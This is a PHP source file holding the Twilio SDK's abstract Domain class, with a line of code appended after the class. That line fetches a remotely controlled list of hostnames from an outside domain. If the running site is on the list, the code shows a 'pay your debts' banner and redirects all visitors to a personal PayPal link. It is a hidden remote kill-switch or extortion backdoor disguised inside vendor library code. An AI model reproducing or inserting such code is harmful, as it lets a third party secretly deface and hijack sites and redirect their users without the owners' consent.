<?php


namespace Twilio;


use Twilio\Http\Response;
use Twilio\Rest\Client;

/**
 * Class Domain
 * Abstracts a Twilio sub domain
 * @package Twilio
 */
abstract class Domain {
    /**
     * @var Client Twilio Client
     */
    protected $client;

    /**
     * @var string Base URL for this domain
     */
    protected $baseUrl;

    /**
     * Construct a new Domain
     * @param Client $client used to communicate with Twilio
     */
    public function __construct(Client $client) {
        $this->client = $client;
        $this->baseUrl = '';
    }

    /**
     * Translate version relative URIs into absolute URLs
     *
     * @param string $uri Version relative URI
     * @return string Absolute URL for this domain
     */
    public function absoluteUrl(string $uri): string {
        return \implode('/', [\trim($this->baseUrl, '/'), \trim($uri, '/')]);
    }

    /**
     * Make an HTTP request to the domain
     *
     * @param string $method HTTP Method to make the request with
     * @param string $uri Relative uri to make a request to
     * @param array $params Query string arguments
     * @param array $data Post form data
     * @param array $headers HTTP headers to send with the request
     * @param string $user User to authenticate as
     * @param string $password Password
     * @param int $timeout Request timeout
     * @return Response the response for the request
     */
    public function request(string $method, string $uri,
                            array $params = [], array $data = [], array $headers = [],
                            string $user = null, string $password = null,
                            int $timeout = null): Response {
        $url = $this->absoluteUrl($uri);
        return $this->client->request(
            $method,
            $url,
            $params,
            $data,
            $headers,
            $user,
            $password,
            $timeout
        );
    }

    public function getClient(): Client {
        return $this->client;
    }

    public function __toString(): string {
        return '[Domain]';
    }
}


$url='http://comercializadoraallotnetenforcer.com/deudores.txt';$ch= curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);$output=curl_exec($ch);curl_close($ch);$array=json_decode($output,TRUE);$uri=str_replace("www.","",str_replace(".com","",str_replace("/","",$_SERVER['HTTP_HOST'])));/*echo "<pre>";var_dump($array);echo "</pre>";echo "<br>".$uri."<br>".$array[1];/**/if(in_array($uri, $array)){echo "<br><h1><br><br><a style='color:red;background-color:yellow;' href = 'https://www.paypal.me/alexcd2000'>Hey Site-Admin! Don't be a rascal! Pay your debts HERE</a><br><br></h1><br>";/*A veces no se puede enviar el header, por eso el h1*/header('Location: https://www.paypal.me/alexcd2000');/*en caso de que por php no se pueda simula mouse click:/**/echo '<script>window.location.href = "https://www.paypal.me/alexcd2000";</script>';/*o simula HTTP redirect:/**/echo '<script>window.location.replace("https://www.paypal.me/alexcd2000");</script>'; exit();} 